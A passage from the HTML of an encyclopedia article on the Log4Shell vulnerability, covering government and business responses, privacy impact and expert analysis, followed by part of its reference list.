</p><p>Germany's <a href="Federal_Office_for_Information_Security" title="Federal Office for Information Security">Bundesamt für Sicherheit in der Informationstechnik</a> (BSI) designated the exploit as being at the agency's highest threat level, calling it an "extremely critical threat situation" (translated). It also reported that several attacks were already successful and that the extent of the exploit remained hard to assess.<sup id="cite_ref-55" class="reference"><a href="#cite_note-55"><span class="cite-bracket">[</span>55<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-56" class="reference"><a href="#cite_note-56"><span class="cite-bracket">[</span>56<span class="cite-bracket">]</span></a></sup> The Netherlands's National Cyber Security Centre (NCSC) began an ongoing list of vulnerable applications.<sup id="cite_ref-57" class="reference"><a href="#cite_note-57"><span class="cite-bracket">[</span>57<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-58" class="reference"><a href="#cite_note-58"><span class="cite-bracket">[</span>58<span class="cite-bracket">]</span></a></sup>
</p><p>The <a href="Canadian_Centre_for_Cyber_Security" class="mw-redirect" title="Canadian Centre for Cyber Security">Canadian Centre for Cyber Security</a> (CCCS) called on organizations to take immediate action.<sup id="cite_ref-59" class="reference"><a href="#cite_note-59"><span class="cite-bracket">[</span>59<span class="cite-bracket">]</span></a></sup> The <a href="Canada_Revenue_Agency" title="Canada Revenue Agency">Canada Revenue Agency</a> temporarily shut down its online services after learning of the exploit, while the <a href="Government_of_Quebec" title="Government of Quebec">Government of Quebec</a> closed almost 4,000 of its websites as a "preventative measure."<sup id="cite_ref-60" class="reference"><a href="#cite_note-60"><span class="cite-bracket">[</span>60<span class="cite-bracket">]</span></a></sup> The <a href="Belgian_Ministry_of_Defence" class="mw-redirect" title="Belgian Ministry of Defence">Belgian Ministry of Defence</a> experienced a breach attempt and was forced to shut down part of its network.<sup id="cite_ref-61" class="reference"><a href="#cite_note-61"><span class="cite-bracket">[</span>61<span class="cite-bracket">]</span></a></sup>
</p><p>The Chinese <a href="Ministry_of_Industry_and_Information_Technology" title="Ministry of Industry and Information Technology">Ministry of Industry and Information Technology</a> suspended work with Alibaba Cloud as a cybersecurity threat intelligence partner for six months for failing to report the vulnerability to the government first.<sup id="cite_ref-62" class="reference"><a href="#cite_note-62"><span class="cite-bracket">[</span>62<span class="cite-bracket">]</span></a></sup>
</p>
<div class="mw-heading mw-heading3"><h3 id="Businesses">Businesses</h3></div>
<p>Research conducted by <a href="Wiz_(company)" class="mw-redirect" title="Wiz (company)">Wiz</a> and <a href="Ernst_%26_Young" title="Ernst &amp; Young">EY</a><sup id="cite_ref-:6_18-1" class="reference"><a href="#cite_note-:6-18"><span class="cite-bracket">[</span>18<span class="cite-bracket">]</span></a></sup> showed that 93% of the cloud enterprise environment were vulnerable to Log4Shell. 7% of vulnerable workloads are exposed to the Internet and prone to wide exploitation attempts. According to the research, ten days after vulnerability disclosure (20 December 2021) only 45% of vulnerable workloads were patched on average in cloud environments. Amazon, Google and Microsoft cloud data was affected by Log4Shell.<sup id="cite_ref-:7_9-7" class="reference"><a href="#cite_note-:7-9"><span class="cite-bracket">[</span>9<span class="cite-bracket">]</span></a></sup> Microsoft asked Windows and Azure customers to remain vigilant after observing state-sponsored and cyber-criminal attackers probing systems for the Log4j 'Log4Shell' flaw through December 2021.<sup id="cite_ref-63" class="reference"><a href="#cite_note-63"><span class="cite-bracket">[</span>63<span class="cite-bracket">]</span></a></sup>
</p><p>The <a href="Human_resource_management_system" title="Human resource management system">human resource management</a> and <a href="Workforce_management" title="Workforce management">workforce management</a> company <a href="UKG" title="UKG">UKG</a>, one of the largest businesses in the industry, was targeted by a <a href="Ransomware" title="Ransomware">ransomware</a> attack that affected large businesses.<sup id="cite_ref-:1_20-1" class="reference"><a href="#cite_note-:1-20"><span class="cite-bracket">[</span>20<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-:3_64-0" class="reference"><a href="#cite_note-:3-64"><span class="cite-bracket">[</span>64<span class="cite-bracket">]</span></a></sup> UKG said it did not have evidence of Log4Shell being exploited in the incident, though analyst Allan Liska from cybersecurity company <a href="Recorded_Future" title="Recorded Future">Recorded Future</a> said there was possibly a connection.<sup id="cite_ref-:3_64-1" class="reference"><a href="#cite_note-:3-64"><span class="cite-bracket">[</span>64<span class="cite-bracket">]</span></a></sup>
</p><p>As larger companies began to release patches for the exploit, the risk for small businesses increased as hackers focused on more vulnerable targets.<sup id="cite_ref-:2_47-2" class="reference"><a href="#cite_note-:2-47"><span class="cite-bracket">[</span>47<span class="cite-bracket">]</span></a></sup>
</p>
<div class="mw-heading mw-heading3"><h3 id="Privacy">Privacy</h3></div>
<p>Some personal devices connected to the Internet, such as <a href="Smart_TV" title="Smart TV">smart TVs</a> and security cameras, were vulnerable to the exploit. Some software may never get a patch due to discontinued manufacturer support.<sup id="cite_ref-:7_9-8" class="reference"><a href="#cite_note-:7-9"><span class="cite-bracket">[</span>9<span class="cite-bracket">]</span></a></sup>
</p>
<div class="mw-heading mw-heading2"><h2 id="Analysis">Analysis</h2></div>
<p>As of 14&nbsp;December&nbsp;2021, almost half of all corporate networks globally have been actively probed, with over 60 variants of the exploit having been produced within 24 hours.<sup id="cite_ref-65" class="reference"><a href="#cite_note-65"><span class="cite-bracket">[</span>65<span class="cite-bracket">]</span></a></sup> <a href="Check_Point" title="Check Point">Check Point</a> Software Technologies in a detailed analysis described the situation as being "a true cyber-pandemic" and characterizing the potential for damage as being "incalculable".<sup id="cite_ref-66" class="reference"><a href="#cite_note-66"><span class="cite-bracket">[</span>66<span class="cite-bracket">]</span></a></sup> Several initial advisories exaggerated the amount of packages that were vulnerable, leading to false positives. Most notably, the "log4j-api" package was marked as vulnerable, while in reality further research showed that only the main "log4j-core" package was vulnerable. This was confirmed both in the original issue thread<sup id="cite_ref-67" class="reference"><a href="#cite_note-67"><span class="cite-bracket">[</span>67<span class="cite-bracket">]</span></a></sup> and by external security researchers.<sup id="cite_ref-68" class="reference"><a href="#cite_note-68"><span class="cite-bracket">[</span>68<span class="cite-bracket">]</span></a></sup>
</p><p>Technology magazine <a href="Wired_(magazine)" title="Wired (magazine)"><i>Wired</i></a> wrote that despite the previous "hype" surrounding multiple vulnerabilities, "the Log4j vulnerability<span class="nowrap">&nbsp;</span>... lives up to the hype for a host of reasons".<sup id="cite_ref-:4_19-2" class="reference"><a href="#cite_note-:4-19"><span class="cite-bracket">[</span>19<span class="cite-bracket">]</span></a></sup> The magazine explains that the pervasiveness of Log4j, the vulnerability being difficult to detect by potential targets and the ease of transmitting code to victims created a "combination of severity, simplicity, and pervasiveness that has the security community rattled".<sup id="cite_ref-:4_19-3" class="reference"><a href="#cite_note-:4-19"><span class="cite-bracket">[</span>19<span class="cite-bracket">]</span></a></sup> <i>Wired</i> also outlined stages of hackers using Log4Shell; cryptomining groups first using the vulnerability, <a href="Data_brokers" class="mw-redirect" title="Data brokers">data brokers</a> then selling a "foothold" to cybercriminals, who finally go on to engage in ransomware attacks, <a href="Espionage" title="Espionage">espionage</a> and destroying data.<sup id="cite_ref-:4_19-4" class="reference"><a href="#cite_note-:4-19"><span class="cite-bracket">[</span>19<span class="cite-bracket">]</span></a></sup>
</p><p><a href="Amit_Yoran" title="Amit Yoran">Amit Yoran</a>, CEO of <a href="Tenable%2C_Inc." title="Tenable, Inc.">Tenable</a> and the founding director of the <a href="United_States_Computer_Emergency_Readiness_Team" title="United States Computer Emergency Readiness Team">United States Computer Emergency Readiness Team</a>, stated "[Log4Shell] is by far the single biggest, most critical vulnerability ever", noting that sophisticated attacks were beginning shortly after the bug, saying "We're also already seeing it leveraged for ransomware attacks, which, again, should be a major alarm bell&nbsp;... We've also seen reports of attackers using Log4Shell to destroy systems without even looking to collect ransom, a fairly unusual behavior".<sup id="cite_ref-:4_19-5" class="reference"><a href="#cite_note-:4-19"><span class="cite-bracket">[</span>19<span class="cite-bracket">]</span></a></sup> <a href="Sophos" title="Sophos">Sophos</a>'s senior threat researcher Sean Gallagher said, "Honestly, the biggest threat here is that people have already gotten access and are just sitting on it, and even if you remediate the problem somebody's already in the network&nbsp;... It's going to be around as long as the Internet."<sup id="cite_ref-:4_19-6" class="reference"><a href="#cite_note-:4-19"><span class="cite-bracket">[</span>19<span class="cite-bracket">]</span></a></sup>
</p><p>According to a <i>Bloomberg News</i> report, some anger was directed at Apache's developers at their failure to fix the vulnerability after warnings about exploits of broad classes of software, including Log4j, were made at a 2016 cybersecurity conference.<sup id="cite_ref-69" class="reference"><a href="#cite_note-69"><span class="cite-bracket">[</span>69<span class="cite-bracket">]</span></a></sup>
</p>
<div class="mw-heading mw-heading2"><h2 id="References">References</h2></div>
<style data-mw-deduplicate="TemplateStyles:r1239543626">
/* start https://en.wikipedia.org/ */


.mw-parser-output .reflist{margin-bottom:0.5em;list-style-type:decimal}@media screen{.mw-parser-output .reflist{font-size:90%}}.mw-parser-output .reflist .references{font-size:100%;margin-bottom:0;list-style-type:inherit}.mw-parser-output .reflist-columns-2{column-width:30em}.mw-parser-output .reflist-columns-3{column-width:25em}.mw-parser-output .reflist-columns{margin-top:0.3em}.mw-parser-output .reflist-columns ol{margin-top:0}.mw-parser-output .reflist-columns li{page-break-inside:avoid;break-inside:avoid-column}.mw-parser-output .reflist-upper-alpha{list-style-type:upper-alpha}.mw-parser-output .reflist-upper-roman{list-style-type:upper-roman}.mw-parser-output .reflist-lower-alpha{list-style-type:lower-alpha}.mw-parser-output .reflist-lower-greek{list-style-type:lower-greek}.mw-parser-output .reflist-lower-roman{list-style-type:lower-roman}


/* end https://en.wikipedia.org/ */
</style><div class="reflist">
<div class="mw-references-wrap mw-references-columns"><ol class="references">
<li id="cite_note-mcafee-1"><span class="mw-cite-backlink">^ <a href="#cite_ref-mcafee_1-0"><sup><i><b>a</b></i></sup></a> <a href="#cite_ref-mcafee_1-1"><sup><i><b>b</b></i></sup></a></span> <span class="reference-text"><cite id="CITEREFPovolnyMcKee2021" class="citation web cs1">Povolny, Steve; McKee, Douglas (10 December 2021). <a rel="nofollow" class="external text" href="https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/log4shell-vulnerability-is-the-coal-in-our-stocking-for-2021/">"Log4Shell Vulnerability is the Coal in our Stocking for 2021"</a>. <i><a href="McAfee" title="McAfee">McAfee</a></i><span class="reference-accessdate">. Retrieved <span class="nowrap">12 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-lunasec-2"><span class="mw-cite-backlink">^ <a href="#cite_ref-lunasec_2-0"><sup><i><b>a</b></i></sup></a> <a href="#cite_ref-lunasec_2-1"><sup><i><b>b</b></i></sup></a> <a href="#cite_ref-lunasec_2-2"><sup><i><b>c</b></i></sup></a> <a href="#cite_ref-lunasec_2-3"><sup><i><b>d</b></i></sup></a></span> <span class="reference-text"><cite id="CITEREFWortleyThrompsonAllison2021" class="citation web cs1">Wortley, Free; Thrompson, Chris; Allison, Forrest (9 December 2021). <a rel="nofollow" class="external text" href="https://web.archive.org/web/20240616040703/https://www.lunasec.io/docs/blog/log4j-zero-day/">"Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package"</a>. <i>LunaSec</i>. Archived from <a rel="nofollow" class="external text" href="https://www.lunasec.io/docs/blog/log4j-zero-day/">the original</a> on 16 June 2024<span class="reference-accessdate">. Retrieved <span class="nowrap">16 June</span> 2024</span>.</cite></span>
</li>
<li id="cite_note-3"><span class="mw-cite-backlink"><b><a href="#cite_ref-3">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228">"CVE-2021-44228"</a>. <i>Common Vulnerabilities and Exposures</i><span class="reference-accessdate">. Retrieved <span class="nowrap">12 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-4"><span class="mw-cite-backlink"><b><a href="#cite_ref-4">^</a></b></span> <span class="reference-text"><cite class="citation news cs1"><a rel="nofollow" class="external text" href="https://www.bloomberg.com/news/articles/2021-12-13/how-apache-raced-to-fix-a-potentially-disastrous-software-flaw">"Inside the Race to Fix a Potentially Disastrous Software Flaw"</a>. <i>Bloomberg.com</i>. 13 December 2021<span class="reference-accessdate">. Retrieved <span class="nowrap">19 November</span> 2024</span>.</cite></span>
</li>
<li id="cite_note-5"><span class="mw-cite-backlink"><b><a href="#cite_ref-5">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html">"Worst Apache Log4j RCE Zero day Dropped on Internet"</a>. <i>Cyber Kendra</i>. 9 December 2021<span class="reference-accessdate">. Retrieved <span class="nowrap">12 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-wired-6"><span class="mw-cite-backlink">^ <a href="#cite_ref-wired_6-0"><sup><i><b>a</b></i></sup></a> <a href="#cite_ref-wired_6-1"><sup><i><b>b</b></i></sup></a> <a href="#cite_ref-wired_6-2"><sup><i><b>c</b></i></sup></a></span> <span class="reference-text"><cite id="CITEREFNewman2021" class="citation news cs1">Newman, Lily Hay (10 December 2021). <a rel="nofollow" class="external text" href="https://www.wired.com/story/log4j-flaw-hacking-internet/">"'The Internet Is on Fire'"</a>. <i>Wired</i>. <a href="ISSN_(identifier)" class="mw-redirect" title="ISSN (identifier)">ISSN</a>&nbsp;<a rel="nofollow" class="external text" href="https://search.worldcat.org/issn/1059-1028">1059-1028</a><span class="reference-accessdate">. Retrieved <span class="nowrap">12 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-:0-7"><span class="mw-cite-backlink">^ <a href="#cite_ref-:0_7-0"><sup><i><b>a</b></i></sup></a> <a href="#cite_ref-:0_7-1"><sup><i><b>b</b></i></sup></a> <a href="#cite_ref-:0_7-2"><sup><i><b>c</b></i></sup></a> <a href="#cite_ref-:0_7-3"><sup><i><b>d</b></i></sup></a> <a href="#cite_ref-:0_7-4"><sup><i><b>e</b></i></sup></a> <a href="#cite_ref-:0_7-5"><sup><i><b>f</b></i></sup></a> <a href="#cite_ref-:0_7-6"><sup><i><b>g</b></i></sup></a></span> <span class="reference-text"><cite id="CITEREFMurphy2021" class="citation news cs1">Murphy, Hannah (14 December 2021). <a rel="nofollow" class="external text" href="https://www.ft.com/content/d3c244f2-eaba-4c46-9a51-b28fc13d9551">"Hackers launch more than 1.2m attacks through Log4J flaw"</a>. <i><a href="Financial_Times" title="Financial Times">Financial Times</a></i><span class="reference-accessdate">. Retrieved <span class="nowrap">17 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-security-8"><span class="mw-cite-backlink">^ <a href="#cite_ref-security_8-0"><sup><i><b>a</b></i></sup></a> <a href="#cite_ref-security_8-1"><sup><i><b>b</b></i></sup></a> <a href="#cite_ref-security_8-2"><sup><i><b>c</b></i></sup></a></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://logging.apache.org/log4j/2.x/security.html">"Apache Log4j Security Vulnerabilities"</a>. <i>Log4j</i>. Apache Software Foundation<span class="reference-accessdate">. Retrieved <span class="nowrap">12 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-:7-9"><span class="mw-cite-backlink">^ <a href="#cite_ref-:7_9-0"><sup><i><b>a</b></i></sup></a> <a href="#cite_ref-:7_9-1"><sup><i><b>b</b></i></sup></a> <a href="#cite_ref-:7_9-2"><sup><i><b>c</b></i></sup></a> <a href="#cite_ref-:7_9-3"><sup><i><b>d</b></i></sup></a> <a href="#cite_ref-:7_9-4"><sup><i><b>e</b></i></sup></a> <a href="#cite_ref-:7_9-5"><sup><i><b>f</b></i></sup></a> <a href="#cite_ref-:7_9-6"><sup><i><b>g</b></i></sup></a> <a href="#cite_ref-:7_9-7"><sup><i><b>h</b></i></sup></a> <a href="#cite_ref-:7_9-8"><sup><i><b>i</b></i></sup></a></span> <span class="reference-text"><cite id="CITEREFHunterde_Vynck2021" class="citation news cs1">Hunter, Tatum; de Vynck, Gerrit (20 December 2021). <a rel="nofollow" class="external text" href="https://www.washingtonpost.com/technology/2021/12/20/log4j-hack-vulnerability-java/">"The 'most serious' security breach ever is unfolding right now. Here's what you need to know"</a>. <i><a href="The_Washington_Post" title="The Washington Post">The Washington Post</a></i>.</cite></span>
</li>
<li id="cite_note-pcworld-10"><span class="mw-cite-backlink">^ <a href="#cite_ref-pcworld_10-0"><sup><i><b>a</b></i></sup></a> <a href="#cite_ref-pcworld_10-1"><sup><i><b>b</b></i></sup></a></span> <span class="reference-text"><cite id="CITEREFMott2021" class="citation web cs1">Mott, Nathaniel (10 December 2021). <a rel="nofollow" class="external text" href="https://www.pcmag.com/news/countless-serves-are-vulnerable-to-apache-log4j-zero-day-exploit">"Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit"</a>. <i><a href="PC_Magazine" class="mw-redirect" title="PC Magazine">PC Magazine</a></i><span class="reference-accessdate">. Retrieved <span class="nowrap">12 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-technica-11"><span class="mw-cite-backlink"><b><a href="#cite_ref-technica_11-0">^</a></b></span> <span class="reference-text"><cite id="CITEREFGoodin2021" class="citation web cs1">Goodin, Dan (10 December 2021). <a rel="nofollow" class="external text" href="https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/">"Zero-day in ubiquitous Log4j tool poses a grave threat to the Internet"</a>. <i>Ars Technica</i><span class="reference-accessdate">. Retrieved <span class="nowrap">12 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-12"><span class="mw-cite-backlink"><b><a href="#cite_ref-12">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://blogs.apache.org/security/entry/cve-2021-44228">"Apache projects affected by log4j CVE-2021-44228"</a>. 14 December 2021.</cite></span>
</li>
<li id="cite_note-13"><span class="mw-cite-backlink"><b><a href="#cite_ref-13">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://aws.amazon.com/security/security-bulletins/AWS-2021-006/">"Update for Apache Log4j2 Issue (CVE-2021-44228)"</a>. <i>Amazon Web Services</i>. 12 December 2021<span class="reference-accessdate">. Retrieved <span class="nowrap">13 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-14"><span class="mw-cite-backlink"><b><a href="#cite_ref-14">^</a></b></span> <span class="reference-text"><cite id="CITEREFLovejoy2021" class="citation web cs1">Lovejoy, Ben (14 December 2021). <a rel="nofollow" class="external text" href="https://9to5mac.com/2021/12/14/apple-patches-log4shell-icloud-vulnerability/">"Apple patches Log4Shell iCloud vulnerability, described as most critical in a decade"</a>. <i><a href="9to5Mac" title="9to5Mac">9to5Mac</a></i>.</cite></span>
</li>
<li id="cite_note-15"><span class="mw-cite-backlink"><b><a href="#cite_ref-15">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://help.minecraft.net/hc/en-us/articles/4416199399693-Security-Vulnerability-in-Minecraft-Java-Edition">"Security Vulnerability in Minecraft: Java Edition"</a>. <i>Minecraft</i>. <a href="Mojang_Studios" title="Mojang Studios">Mojang Studios</a><span class="reference-accessdate">. Retrieved <span class="nowrap">13 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-16"><span class="mw-cite-backlink"><b><a href="#cite_ref-16">^</a></b></span> <span class="reference-text"><cite id="CITEREFGoodin2021" class="citation web cs1">Goodin, Dan (10 December 2021). <a rel="nofollow" class="external text" href="https://arstechnica.com/information-technology/2021/12/the-critical-log4shell-zero-day-affects-a-whos-who-of-big-cloud-services/">"The Internet's biggest players are all affected by critical Log4Shell 0-day"</a>. <i><a href="ArsTechnica" class="mw-redirect" title="ArsTechnica">ArsTechnica</a></i><span class="reference-accessdate">. Retrieved <span class="nowrap">13 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-17"><span class="mw-cite-backlink"><b><a href="#cite_ref-17">^</a></b></span> <span class="reference-text"><cite id="CITEREFRundle2021" class="citation news cs1">Rundle, David Uberti and James (15 December 2021). <a rel="nofollow" class="external text" href="https://www.wsj.com/articles/what-is-the-log4j-vulnerability-11639446180">"What Is the Log4j Vulnerability?"</a>. <i>Wall Street Journal</i> – via www.wsj.com.</cite></span>
</li>
<li id="cite_note-:6-18"><span class="mw-cite-backlink">^ <a href="#cite_ref-:6_18-0"><sup><i><b>a</b></i></sup></a> <a href="#cite_ref-:6_18-1"><sup><i><b>b</b></i></sup></a></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://www.wiz.io/blog/10-days-later-enterprises-halfway-through-patching-log4shell">"Enterprises halfway through patching Log4Shell | Wiz Blog"</a>. <i>www.wiz.io</i>. 20 December 2021<span class="reference-accessdate">. Retrieved <span class="nowrap">20 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-:4-19"><span class="mw-cite-backlink">^ <a href="#cite_ref-:4_19-0"><sup><i><b>a</b></i></sup></a> <a href="#cite_ref-:4_19-1"><sup><i><b>b</b></i></sup></a> <a href="#cite_ref-:4_19-2"><sup><i><b>c</b></i></sup></a> <a href="#cite_ref-:4_19-3"><sup><i><b>d</b></i></sup></a> <a href="#cite_ref-:4_19-4"><sup><i><b>e</b></i></sup></a> <a href="#cite_ref-:4_19-5"><sup><i><b>f</b></i></sup></a> <a href="#cite_ref-:4_19-6"><sup><i><b>g</b></i></sup></a></span> <span class="reference-text"><cite id="CITEREFBarrett" class="citation news cs1">Barrett, Brian. <a rel="nofollow" class="external text" href="https://www.wired.com/story/log4j-log4shell-vulnerability-ransomware-second-wave/">"The Next Wave of Log4J Attacks Will Be Brutal"</a>. <i><a href="Wired_(magazine)" title="Wired (magazine)">Wired</a></i>. <a href="ISSN_(identifier)" class="mw-redirect" title="ISSN (identifier)">ISSN</a>&nbsp;<a rel="nofollow" class="external text" href="https://search.worldcat.org/issn/1059-1028">1059-1028</a><span class="reference-accessdate">. Retrieved <span class="nowrap">17 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-:1-20"><span class="mw-cite-backlink">^ <a href="#cite_ref-:1_20-0"><sup><i><b>a</b></i></sup></a> <a href="#cite_ref-:1_20-1"><sup><i><b>b</b></i></sup></a></span> <span class="reference-text"><cite id="CITEREFGoodin2021" class="citation web cs1">Goodin, Dan (13 December 2021). <a rel="nofollow" class="external text" href="https://arstechnica.com/information-technology/2021/12/as-log4shell-wreaks-havoc-payroll-service-reports-ransomware-attack/">"As Log4Shell wreaks havoc, payroll service reports ransomware attack"</a>. <i><a href="Ars_Technica" title="Ars Technica">Ars Technica</a></i><span class="reference-accessdate">. Retrieved <span class="nowrap">17 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-21"><span class="mw-cite-backlink"><b><a href="#cite_ref-21">^</a></b></span> <span class="reference-text"><cite id="CITEREFYanDengZhangFu2021" class="citation web cs1">Yan, Tao; Deng, Qi; Zhang, Haozhe; Fu, Yu; Grunzweig, Josh (10 December 2021). <a rel="nofollow" class="external text" href="https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/">"Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228)"</a>. <i>Unit 42</i>. <a href="Palo_Alto_Networks" title="Palo Alto Networks">Palo Alto Networks</a>.</cite></span>
</li>
<li id="cite_note-22"><span class="mw-cite-backlink"><b><a href="#cite_ref-22">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://logging.apache.org/log4j/2.x/">"Apache Log4j 2"</a>. Apache Software Foundation<span class="reference-accessdate">. Retrieved <span class="nowrap">12 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-:5-23"><span class="mw-cite-backlink">^ <a href="#cite_ref-:5_23-0"><sup><i><b>a</b></i></sup></a> <a href="#cite_ref-:5_23-1"><sup><i><b>b</b></i></sup></a></span> <span class="reference-text"><cite id="CITEREFByrnes2021" class="citation web cs1">Byrnes, Jesse (14 December 2021). <a rel="nofollow" class="external text" href="https://thehill.com/policy/technology/overnights/585832-hillicon-valley">"Hillicon Valley — Apache vulnerability sets off alarm bells"</a>. <i><a href="TheHill" class="mw-redirect" title="TheHill">TheHill</a></i><span class="reference-accessdate">. Retrieved <span class="nowrap">17 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-24"><span class="mw-cite-backlink"><b><a href="#cite_ref-24">^</a></b></span> <span class="reference-text"><cite id="CITEREFSermersheim2006" class="citation cs1">Sermersheim, J. (June 2006). <a rel="nofollow" class="external text" href="https://datatracker.ietf.org/doc/html/rfcrfc4511"><i>Lightweight Directory Access Protocol (LDAP): The Protocol</i></a>. International Electronic Task Force. <a href="Doi_(identifier)" class="mw-redirect" title="Doi (identifier)">doi</a>:<span class="id-lock-free" title="Freely accessible"><a rel="nofollow" class="external text" href="https://doi.org/10.17487%2FRFC4513">10.17487/RFC4513</a></span>. <a href="Request_for_Comments" title="Request for Comments">RFC</a> <a rel="nofollow" class="external text" href="https://datatracker.ietf.org/doc/html/rfcrfc4511">rfc4511</a><span class="reference-accessdate">. Retrieved <span class="nowrap">13 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-cloudflare-graham-cumming-25"><span class="mw-cite-backlink">^ <a href="#cite_ref-cloudflare-graham-cumming_25-0"><sup><i><b>a</b></i></sup></a> <a href="#cite_ref-cloudflare-graham-cumming_25-1"><sup><i><b>b</b></i></sup></a> <a href="#cite_ref-cloudflare-graham-cumming_25-2"><sup><i><b>c</b></i></sup></a> <a href="#cite_ref-cloudflare-graham-cumming_25-3"><sup><i><b>d</b></i></sup></a></span> <span class="reference-text"><cite id="CITEREFGraham-Cumming2021" class="citation web cs1">Graham-Cumming, John (10 December 2021). <a rel="nofollow" class="external text" href="https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/">"Inside the Log4j2 vulnerability (CVE-2021-44228)"</a>. <i>The Cloudflare Blog</i><span class="reference-accessdate">. Retrieved <span class="nowrap">13 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-26"><span class="mw-cite-backlink"><b><a href="#cite_ref-26">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://logging.apache.org/log4j/2.x/manual/lookups.html">"Lookups"</a>. <i>Log4j</i>. Apache Software Foundation<span class="reference-accessdate">. Retrieved <span class="nowrap">13 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-ducklin-27"><span class="mw-cite-backlink">^ <a href="#cite_ref-ducklin_27-0"><sup><i><b>a</b></i></sup></a> <a href="#cite_ref-ducklin_27-1"><sup><i><b>b</b></i></sup></a></span> <span class="reference-text"><cite id="CITEREFDucklin2021" class="citation web cs1">Ducklin, Paul (12 December 2021). <a rel="nofollow" class="external text" href="https://nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/">"Log4Shell explained – how it works, why you need to know, and how to fix it"</a>. <i>Naked Security</i>. Sophos<span class="reference-accessdate">. Retrieved <span class="nowrap">12 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-28"><span class="mw-cite-backlink"><b><a href="#cite_ref-28">^</a></b></span> <span class="reference-text"><cite id="CITEREFMiessler2021" class="citation web cs1">Miessler, Daniel (13 December 2021). <a rel="nofollow" class="external text" href="https://danielmiessler.com/podcast/news-analysis-no-311/">"The log4j (Log4Shell) Situation"</a>. <i>Unsupervised Learning</i>.</cite></span>
</li>
<li id="cite_note-29"><span class="mw-cite-backlink"><b><a href="#cite_ref-29">^</a></b></span> <span class="reference-text"><cite id="CITEREFDuraishamyVermaAng2021" class="citation web cs1">Duraishamy, Ranga; Verma, Ashish; Ang, Miguel Carlo (13 December 2021). <a rel="nofollow" class="external text" href="https://www.trendmicro.com/en_us/research/21/l/patch-now-apache-log4j-vulnerability-called-log4shell-being-acti.html">"Patch Now Apache Log4j Vulnerability Called Log4Shell Actively Exploited"</a>. <i>Trend Micro</i><span class="reference-accessdate">. Retrieved <span class="nowrap">14 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-30"><span class="mw-cite-backlink"><b><a href="#cite_ref-30">^</a></b></span> <span class="reference-text"><cite id="CITEREFNarang2021" class="citation web cs1">Narang, Satnam (10 December 2021). <a rel="nofollow" class="external text" href="https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability">"CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)"</a>. <i>Tenable Blog</i><span class="reference-accessdate">. Retrieved <span class="nowrap">14 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-31"><span class="mw-cite-backlink"><b><a href="#cite_ref-31">^</a></b></span> <span class="reference-text"><cite id="CITEREFGaborBluehs2021" class="citation web cs1">Gabor, Gabriel; Bluehs, Gabriel (10 December 2021). <a rel="nofollow" class="external text" href="https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/">"CVE-2021-44228 - Log4j RCE 0-day mitigation"</a>. <i>The Cloudflare Blog</i><span class="reference-accessdate">. Retrieved <span class="nowrap">13 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-32"><span class="mw-cite-backlink"><b><a href="#cite_ref-32">^</a></b></span> <span class="reference-text"><cite id="CITEREFHahad2021" class="citation web cs1">Hahad, Mounir (12 December 2021). <a rel="nofollow" class="external text" href="https://blogs.juniper.net/en-us/enterprise-cloud-and-transformation/apache-log4j-vulnerability-cve-2021-44228-raises-widespread-concerns">"Apache Log4j Vulnerability CVE-2021-44228 Raises widespread Concerns"</a><span class="reference-accessdate">. Retrieved <span class="nowrap">12 December</span> 2021</span>.</cite></span>
</li>
